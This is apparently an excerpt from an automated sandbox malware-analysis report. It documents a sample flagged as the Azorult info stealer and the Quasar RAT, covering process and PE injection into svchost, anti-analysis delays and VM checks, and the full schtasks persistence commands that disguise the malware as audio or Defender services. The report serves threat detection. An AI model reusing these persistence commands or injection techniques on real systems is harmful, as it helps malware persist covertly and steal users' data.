Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\windef.exe TID: 4128	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe TID: 5872	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\windef.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\windef.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: SystemPropertiesPerformance.exe, 0000000A.00000002.941562165.00000000017DC000.00000004.00000001.sdmp	Binary or memory string: vmtoolsd.exe
Source: svchost.exe, 00000005.00000000.720666690.0000020DCBE1F000.00000004.00000001.sdmp, windef.exe, 00000006.00000002.720199755.0000000005849000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DB49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

1_2_00DB49A0

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00E1445A GetFileAttributesW,FindFirstFileW,FindClose,	1_2_00E1445A
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C7FDA0 memset,lstrlenW,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,lstrcatW,memset,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,DeleteFileW,FindNextFileW,FindClose,lstrcpyW,lstrcatW,lstrcatW,memset,RemoveDirectoryW,	5_2_00C7FDA0
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C76554 memset,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,memset,FindFirstFileW,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,SetLastError,FindNextFileW,FindClose,SetLastError,	5_2_00C76554
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C7FFA8 memset,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,lstrlenW,HeapAlloc,lstrcpyW,CreateDirectoryW,GetLastError,FindFirstFileW,GetLastError,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,HeapFree,	5_2_00C7FFA8
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00E1445A GetFileAttributesW,FindFirstFileW,FindClose,	7_2_00E1445A
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00413030 FindFirstFileW,FindNextFileW,FindClose,	7_2_00413030
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_004119A8 FindFirstFileW,FindNextFileW,FindClose,	7_2_004119A8
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_004119AC FindFirstFileW,FindNextFileW,FindClose,	7_2_004119AC
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00412D6C FindFirstFileW,FindNextFileW,FindClose,	7_2_00412D6C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0041160C FindFirstFileW,FindNextFileW,FindClose,	7_2_0041160C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	7_2_00413F58
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	7_2_00413F58
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00AA445A GetFileAttributesW,FindFirstFileW,FindClose,	10_2_00AA445A

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DB4B37 LoadLibraryA,GetProcAddress,

1_2_00DB4B37

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_3_037F00BE mov esi, dword ptr fs:[00000030h]	1_3_037F00BE
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_3_037F00BE mov esi, dword ptr fs:[00000030h]	1_3_037F00BE
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00407AF0 mov eax, dword ptr fs:[00000030h]	7_2_00407AF0
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_3_014C00BE mov esi, dword ptr fs:[00000030h]	10_3_014C00BE
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_3_014C00BE mov esi, dword ptr fs:[00000030h]	10_3_014C00BE

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DB3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

1_2_00DB3B3A

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DE5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

1_2_00DE5A7C

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DE97A2 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

1_2_00DE97A2

Source: C:\Users\user\AppData\Local\Temp\windef.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\System32\svchost.exe

Code function: 5_2_00C9A002 LdrLoadDll,

5_2_00C9A002

Source: C:\Users\user\AppData\Local\Temp\windef.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DDA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00DDA155
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DDA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00DDA155
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A6A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00A6A155

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\AppData\Local\Temp\vnc.exe

Section loaded: unknown target: C:\Windows\System32\svchost.exe protection: execute and read and write

Jump to behavior

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\AppData\Local\Temp\vnc.exe

Memory allocated: C:\Windows\System32\svchost.exe base: D00000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Memory written: C:\Users\user\Desktop\CVbJSUXraQ.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Memory written: C:\Users\user\btpanui\SystemPropertiesPerformance.exe base: 400000 value starts with: 4D5A			Jump to behavior

Contains functionality to inject code into remote processes

Show sources

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_3_037F00BE CreateProcessW,GetThreadContext,ReadProcessMemory,VirtualAlloc,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualProtectEx,VirtualFree,WriteProcessMemory,SetThreadContext,ResumeThread,

1_3_037F00BE

Writes to foreign memory regions

Show sources

Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF6EB844380	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Memory written: C:\Windows\System32\svchost.exe base: D00000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF6EB844380	Jump to behavior

.NET source code references suspicious native API functions

Show sources

Source: winsock.exe.6.dr, u218f?uf56e???ufffd????u25e0??????u20e0uf421.cs	Reference to suspicious API methods: ('????????????????????', 'LoadLibrary@kernel32.dll'), ('????????????????????', 'GetProcAddress@kernel32.dll')
Source: winsock.exe.6.dr, ??uf019??u2720???uf88au171b???????u222f?.cs	Reference to suspicious API methods: ('????????????????????', 'MapVirtualKeyEx@user32.dll')
Source: 6.0.windef.exe.f10000.0.unpack, u218f?uf56e???ufffd????u25e0??????u20e0uf421.cs	Reference to suspicious API methods: ('????????????????????', 'LoadLibrary@kernel32.dll'), ('????????????????????', 'GetProcAddress@kernel32.dll')
Source: 6.0.windef.exe.f10000.0.unpack, ??uf019??u2720???uf88au171b???????u222f?.cs	Reference to suspicious API methods: ('????????????????????', 'MapVirtualKeyEx@user32.dll')
Source: 6.2.windef.exe.f10000.0.unpack, ??uf019??u2720???uf88au171b???????u222f?.cs	Reference to suspicious API methods: ('????????????????????', 'MapVirtualKeyEx@user32.dll')
Source: 6.2.windef.exe.f10000.0.unpack, u218f?uf56e???ufffd????u25e0??????u20e0uf421.cs	Reference to suspicious API methods: ('????????????????????', 'LoadLibrary@kernel32.dll'), ('????????????????????', 'GetProcAddress@kernel32.dll')

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Local\Temp\vnc.exe

Thread register set: target process: 5200

Jump to behavior

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DB48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

1_2_00DB48D7

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Users\user\AppData\Local\Temp\vnc.exe 'C:\Users\user\AppData\Local\Temp\vnc.exe'	Jump to behavior
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'	Jump to behavior
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Users\user\Desktop\CVbJSUXraQ.exe C:\Users\user\Desktop\CVbJSUXraQ.exe	Jump to behavior
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks' /create /tn 'win defender run' /sc ONLOGON /tr 'C:\Users\user\AppData\Local\Temp\windef.exe' /rl HIGHEST /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process created: C:\Users\user\AppData\Roaming\SubDir\winsock.exe C:\Users\user\AppData\Roaming\SubDir\winsock.exe	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Users\user\AppData\Local\Temp\vnc.exe 'C:\Users\user\AppData\Local\Temp\vnc.exe'	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Users\user\btpanui\SystemPropertiesPerformance.exe C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F	Jump to behavior

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DB3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

1_2_00DB3B3A

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00E0874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

1_2_00E0874B

Source: CVbJSUXraQ.exe, 00000001.00000000.668612321.0000000000E64000.00000002.00020000.sdmp, CVbJSUXraQ.exe, 00000007.00000002.939474482.0000000000E64000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000000.695369238.0000000000AF4000.00000002.00020000.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: CVbJSUXraQ.exe, 00000001.00000002.944287940.0000000002350000.00000002.00020000.sdmp, vnc.exe, svchost.exe, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: CVbJSUXraQ.exe, SystemPropertiesPerformance.exe	Binary or memory string: Shell_TrayWnd
Source: CVbJSUXraQ.exe, 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp, vnc.exe, svchost.exe, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	Binary or memory string: GetProgmanWindow
Source: CVbJSUXraQ.exe, 00000001.00000002.944287940.0000000002350000.00000002.00020000.sdmp, vnc.exe, svchost.exe, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	Binary or memory string: Progman
Source: CVbJSUXraQ.exe, 00000001.00000002.944287940.0000000002350000.00000002.00020000.sdmp, svchost.exe, 00000005.00000000.720749842.0000020DCC390000.00000002.00020000.sdmp, CVbJSUXraQ.exe, 00000007.00000002.942639016.0000000001DD0000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000002.942828030.00000000029A0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: CVbJSUXraQ.exe, 00000001.00000002.944000384.00000000016FA000.00000004.00000001.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000002.941562165.00000000017DC000.00000004.00000001.sdmp	Binary or memory string: [CLASS:Progman]
Source: SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	Binary or memory string: explorerframe.dllshell32.dllexplorer.exewindows.immersiveshell.serviceprovider.dlltwinui.dllwpncore.dllauthui.dllpnidui.dllhgcpl.dllBINotifiedNewSessionEventStartMenuCacheFileReorderShellReadyEventShellDesktopSwitchEventwindows.immersiveshell.serviceprovider.dllCreateDesktopExACreateDesktopExWOpenDesktopAOpenDesktopWOpenInputDesktopSwitchDesktopSetThreadDesktopGetUserObjectInformationAGetUserObjectInformationWFlashWindowExFlashWindowGetCaretBlinkTimeTrackPopupMenuExSetShellWindowSetShellWindowExGetShellWindowSetTaskmanWindowGetTaskmanWindowSetProgmanWindowGetProgmanWindowSystemParametersInfoWSystemParametersInfoAgdi32.dllSetDIBitsToDeviceBitBltWinmm.dllPlaySoundAPlaySoundWsndPlaySoundAsndPlaySoundWBeepMessageBeepwaveOutOpendsound.dllDirectSoundCreateDirectSoundCaptureCreateDirectSoundFullDuplexCreate8DirectSoundFullDuplexCreateDirectSoundCreate8DirectSoundCaptureCreate8LoadLibraryWLoadLibraryExALoadLibraryExWGetProcAddressRegQueryValueExWRegGetValueWntdll.dllZwRaiseHardErrorNtRaiseHardErrorZwConnectPortNtConnectPortShell32.dllSHRestrictedSHGetSetSettingsUxTheme.dllSetThemeAppPropertiesDefWindowProcWDefWindowProcADefDlgProcWDefDlgProcADefFrameProcWDefFrameProcADefMDIChildProcWDefMDIChildProcACallWindowProcWCallWindowProcAGetMessageWGetMessageAPeekMessageWPeekMessageATranslateMessageGetCursorPosd3d10_1.dllSetCursorPosd3d10_1core.dlld3d10.dlld3d10core.dlld2d1.dllGetMessagePosOPENGL32.dlld3d9.dlld3d11.dllDxtrans.dllSetCaptureFlash6.ocxReleaseCaptureGetCaptureCreateDesktopACreateDesktopWCreateDXGIFactory1D3D10CreateDevice1Direct3DCreate9Direct3DCreate9Ex\ThemeApiPortRtlSetUnhandledExceptionFilterMessageBoxTimeoutAuser32Program ManagerProgmanSHELLDLL_DefViewFolderViewSysListView32Shell_TrayWndNotifyIconOverflowWindow/0#32770MSTaskSwWClassTrayNotifyWndtaskmgrversion.dllGetFileVersionInfoSizeWGetFileVersionInfoW1.3.6.1.4.1.311.2.1.12rY
Source: SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	Binary or memory string: explorerframe.dllshell32.dllexplorer.exewindows.immersiveshell.serviceprovider.dlltwinui.dllwpncore.dllauthui.dllpnidui.dllhgcpl.dllBINotifiedNewSessionEventStartMenuCacheFileReorderShellReadyEventShellDesktopSwitchEventwindows.immersiveshell.serviceprovider.dllDefWindowProcWDefWindowProcADefDlgProcWDefDlgProcADefFrameProcWDefFrameProcADefMDIChildProcWDefMDIChildProcACallWindowProcWCallWindowProcAGetMessageWGetMessageAPeekMessageWPeekMessageATranslateMessageGetCursorPosd3d10_1.dllSetCursorPosd3d10_1core.dlld3d10.dlld3d10core.dlld2d1.dllGetMessagePosOPENGL32.dlld3d9.dlld3d11.dllDxtrans.dllSetCaptureFlash6.ocxReleaseCaptureGetCaptureCreateDesktopACreateDesktopWCreateDesktopExACreateDesktopExWOpenDesktopAOpenDesktopWOpenInputDesktopSwitchDesktopSetThreadDesktopGetUserObjectInformationAGetUserObjectInformationWFlashWindowExFlashWindowGetCaretBlinkTimeTrackPopupMenuExSetShellWindowSetShellWindowExGetShellWindowSetTaskmanWindowGetTaskmanWindowSetProgmanWindowGetProgmanWindowSystemParametersInfoWSystemParametersInfoAgdi32.dllSetDIBitsToDeviceBitBltWinmm.dllPlaySoundAPlaySoundWsndPlaySoundAsndPlaySoundWBeepMessageBeepwaveOutOpendsound.dllDirectSoundCreateDirectSoundCaptureCreateDirectSoundFullDuplexCreate8DirectSoundFullDuplexCreateDirectSoundCreate8DirectSoundCaptureCreate8LoadLibraryWLoadLibraryExALoadLibraryExWGetProcAddressRegQueryValueExWRegGetValueWntdll.dllZwRaiseHardErrorNtRaiseHardErrorZwConnectPortNtConnectPortShell32.dllSHRestrictedSHGetSetSettingsUxTheme.dllSetThemeAppPropertiesCreateDXGIFactory1D3D10CreateDevice1Direct3DCreate9Direct3DCreate9Ex\ThemeApiPortRtlSetUnhandledExceptionFilterMessageBoxTimeoutAuser32Program ManagerProgmanSHELLDLL_DefViewFolderViewSysListView32Shell_TrayWndNotifyIconOverflowWindow/0#32770MSTaskSwWClassTrayNotifyWndtaskmgr\version.dllGetFileVersionInfoSizeWGetFileVersionInfoW1.3.6.1.4.1.311.2.1.12rY
Source: CVbJSUXraQ.exe, 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp, vnc.exe, svchost.exe, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	Binary or memory string: SetProgmanWindow

Source: C:\Windows\System32\svchost.exe	Code function: GetWindowRect,GetWindowRect,GetWindowRect,RedrawWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetLocaleInfoW,CharUpperBuffW,memcpy,RedrawWindow,		5_2_00C83460
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: GetLocaleInfoA,		7_2_00404BA8

Source: C:\Users\user\AppData\Local\Temp\windef.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\windef.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\vnc.exe

Code function: 4_2_00ACEA96 cpuid

4_2_00ACEA96

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DD520A GetSystemTimeAsFileTime,__aulldiv,

1_2_00DD520A

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 7_2_004065F0 GetUserNameW,

7_2_004065F0

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DB49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

1_2_00DB49A0

Stealing of Sensitive Information:

Yara detected Azorult Info Stealer

Show sources

Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.3800000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.3800000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.755481459.0000000001886000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.755557311.00000000018A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671626163.0000000001804000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.755386297.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.790922233.00000000014D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.791563765.0000000001886000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.795274268.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671306839.00000000017E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671456955.00000000017CB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.790988055.000000000192E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671650973.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.941562165.00000000017DC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.794854333.0000000000401000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.689677970.000000000176B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.941883221.0000000001557000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671172624.00000000017CB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671475144.00000000017CB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.791810701.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671495263.0000000001804000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.686858693.000000000183D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.689148939.0000000003800000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671160297.0000000001794000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.690115376.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR

Yara detected Quasar RAT

Show sources

Source: Yara match	File source: CVbJSUXraQ.exe, type: SAMPLE
Source: Yara match	File source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
